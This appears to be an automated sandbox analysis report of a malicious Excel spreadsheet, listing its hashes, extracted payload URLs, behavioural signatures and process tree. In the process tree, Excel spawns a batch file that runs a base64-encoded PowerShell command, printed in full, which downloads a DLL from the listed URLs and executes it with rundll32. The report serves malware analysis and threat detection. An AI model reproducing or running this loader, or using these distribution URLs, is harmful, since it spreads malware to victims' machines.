Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 22:37
Behavioral task
behavioral1
Sample
73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls
Resource
win10v2004-20241007-en
General
-
Target
73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls
-
Size
141KB
-
MD5
a16fbff1f5cb9686bb89b10e438fa353
-
SHA1
ed66c497457afb8309866e2cacf62857d9e844c9
-
SHA256
73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd
-
SHA512
35fce4faf788b1b5e074ee55a4ef2b2956d6a5b22f5fc5d1daa34bfdd5c36ccd85ac5808088d0e8a1cac147f6a4033ed8fd5e55e0930c76cbb2bdc6d74c32642
-
SSDEEP
3072:P7cKoSsxzNDZLDZjlbR868O8K0c03D38TehYTdeHVhjqabWHLtyeGx6Z84TI0Gxc:zcKoSsxzNDZLDZjlbR868O8K0c03D38X
Malware Config
Extracted
http://chupahfashion.com/eh6bwxk/bowptl/cLo9eq8v8Vht/
http://ancyh.xyz/Fox-C/LxAhgyO3fMg/
http://gravton-dev-cms.policyfest.com/Fox-C/BMOkGelwu/
https://capitalui.futuristic.agency/wp-admin/hwi9bnmXFFm3doo/
http://cptdmy.com/zqtr/zdJE0jEOxL/
https://weviralyou.com/wp-content/yl5qV15jWWfaGdSZLR/
https://megabyte-xtnegocios.com/ys3v1clw/AKm6Q9/
https://vmsparamedical.com/urjk0xr/PhfwL/
https://viprait.com/lag5gn/cdy6k/
https://comingsoon.futuristic.agency/svg/p4xODmupFbHPnr/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1304 688 cmd.exe 81 -
Blocklisted process makes network request 9 IoCs
flow pid Process 28 4896 powershell.exe 29 4896 powershell.exe 33 4896 powershell.exe 34 4896 powershell.exe 36 4896 powershell.exe 39 4896 powershell.exe 43 4896 powershell.exe 48 4896 powershell.exe 50 4896 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 688 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4896 powershell.exe 4896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4896 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE 688 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 688 wrote to memory of 1304 688 EXCEL.EXE 86 PID 688 wrote to memory of 1304 688 EXCEL.EXE 86 PID 1304 wrote to memory of 4896 1304 cmd.exe 88 PID 1304 wrote to memory of 4896 1304 cmd.exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\73938b7c33abea137db59379cfb5480c697197ff03aebeee8921cd82dadf23bd.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\ihofbnm.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAByAG8AdwBpAGYAaQB1AGQAPQAiAGgAdAB0AHAAOgAvAC8AYwBoAHUAcABhAGgAZgBhAHMAaABpAG8AbgAuAGMAbwBtAC8AZQBoADYAYgB3AHgAawAvAGIAbwB3AHAAdABsAC8AYwBMAG8AOQBlAHEAOAB2ADgAVgBoAHQALwAsAGgAdAB0AHAAOgAvAC8AYQBuAGMAeQBoAC4AeAB5AHoALwBGAG8AeAAtAEMALwBMAHgAQQBoAGcAeQBPADMAZgBNAGcALwAsAGgAdAB0AHAAOgAvAC8AZwByAGEAdgB0AG8AbgAtAGQAZQB2AC0AYwBtAHMALgBwAG8AbABpAGMAeQBmAGUAcwB0AC4AYwBvAG0ALwBGAG8AeAAtAEMALwBCAE0ATwBrAEcAZQBsAHcAdQAvACwAaAB0AHQAcABzADoALwAvAGMAYQBwAGkAdABhAGwAdQBpAC4AZgB1AHQAdQByAGkAcwB0AGkAYwAuAGEAZwBlAG4AYwB5AC8AdwBwAC0AYQBkAG0AaQBuAC8AaAB3AGkAOQBiAG4AbQBYAEYARgBtADMAZABvAG8ALwAsAGgAdAB0AHAAOgAvAC8AYwBwAHQAZABtAHkALgBjAG8AbQAvAHoAcQB0AHIALwB6AGQASgBFADAAagBFAE8AeABMAC8ALABoAHQAdABwAHMAOgAvAC8AdwBlAHYAaQByAGEAbAB5AG8AdQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHkAbAA1AHEAVgAxADUAagBXAFcAZgBhAEcAZABTAFoATABSAC8ALABoAHQAdABwAHMAOgAvAC8AbQBlAGcAYQBiAHkAdABlAC0AeAB0AG4AZQBnAG8AYwBpAG8AcwAuAGMAbwBtAC8AeQBzADMAdgAxAGMAbAB3AC8AQQBLAG0ANgBRADkALwAsAGgAdAB0AHAAcwA6AC8ALwB2AG0AcwBwAGEAcgBhAG0AZQBkAGkAYwBhAGwALgBjAG8AbQAvAHUAcgBqAGsAMAB4AHIALwBQAGgAZgB3AEwALwAsAGgAdAB0AHAAcwA6AC8ALwB2AGkAcAByAGEAaQB0AC4AYwBvAG0ALwBsAGEAZwA1AGcAbgAvAGMAZAB5ADYAawAvACwAaAB0AHQAcABzADoALwAvAGMAbwBtAGkAbgBnAHMAbwBvAG4ALgBmAHUAdAB1AHIAaQBzAHQAaQBjAC4AYQBnAGUAbgBjAHkALwBzAHYAZwAvAHAANAB4AE8ARABtAHUAcABGAGIASABQAG4AcgAvACIALgBTAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAoACQAcwB0ACAAaQBuACAAJAByAG8AdwBpAGYAaQB1AGQAKQB7ACQAcgByAHkAaQB1AGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABmAGcAaABpAHUAcwA9AEcAZQB0AC0AUgBhAG4AZABvAG0AOwAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA9ACIAYwA6AFwAcAByAG8AZwByAGEAbQBkAGEAdABhAFwAIgArACQAcgByAHkAaQB1AGQAKwAiAC4AZABsAGwAIgA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHMAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwA7AGkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABHAHMAcgBGAEoAWQBqAGQANQA0ADYAZABzACkAewBpAGYAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAJABnAGgARABEAEYASgBIAGsANQBmAD0AIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdwBvAHcANgA0AFwAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgA7ACQAdAB5AGkAZAB1AGkAcwBkAGYAZgA9ACQARwBzAHIARgBKAFkAagBkADUANAA2AGQAcwArACIALABmACIAKwAkAGYAZwBoAGkAdQBzADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZwBoAEQARABGAEoASABrADUAZgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHQAeQBpAGQAdQBpAHMAZABmAGYAOwBiAHIAZQBhAGsAOwB9AH0AfQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD572264969baed597c6568e62a8815956e
SHA140ff9b6a8e6fb18ad1593aa8efd2ef8880047b14
SHA2563f16d8092e1dab799ef6afd487211439247bf5af14f7efeb00060bf84e6579c0
SHA512cbac30980e09ffb44077eb06cca082e3a731288508e344e09f807e85f7dc10a2d3f4f66131c42f6e102fb4ee60fdd4af579df823f2dbc902a4111782ce563c33
-
Filesize
3KB
MD5d7f8d77efca69f7600e190537d147b6c
SHA19709843ea19f342b3a95075588c4b6fdb688623d
SHA2568fe05c046c282ee13765fb78ba5b27201571a74a46dbc901898255c111727caf
SHA512dd975f74367e9ddaed18e0630556f14f8bd32f5e89ec13b92f933cbdfc32951e61b4da406407cb7e7cd37a2fe41726c200a0c1377ac8686f835eccfec599b5e2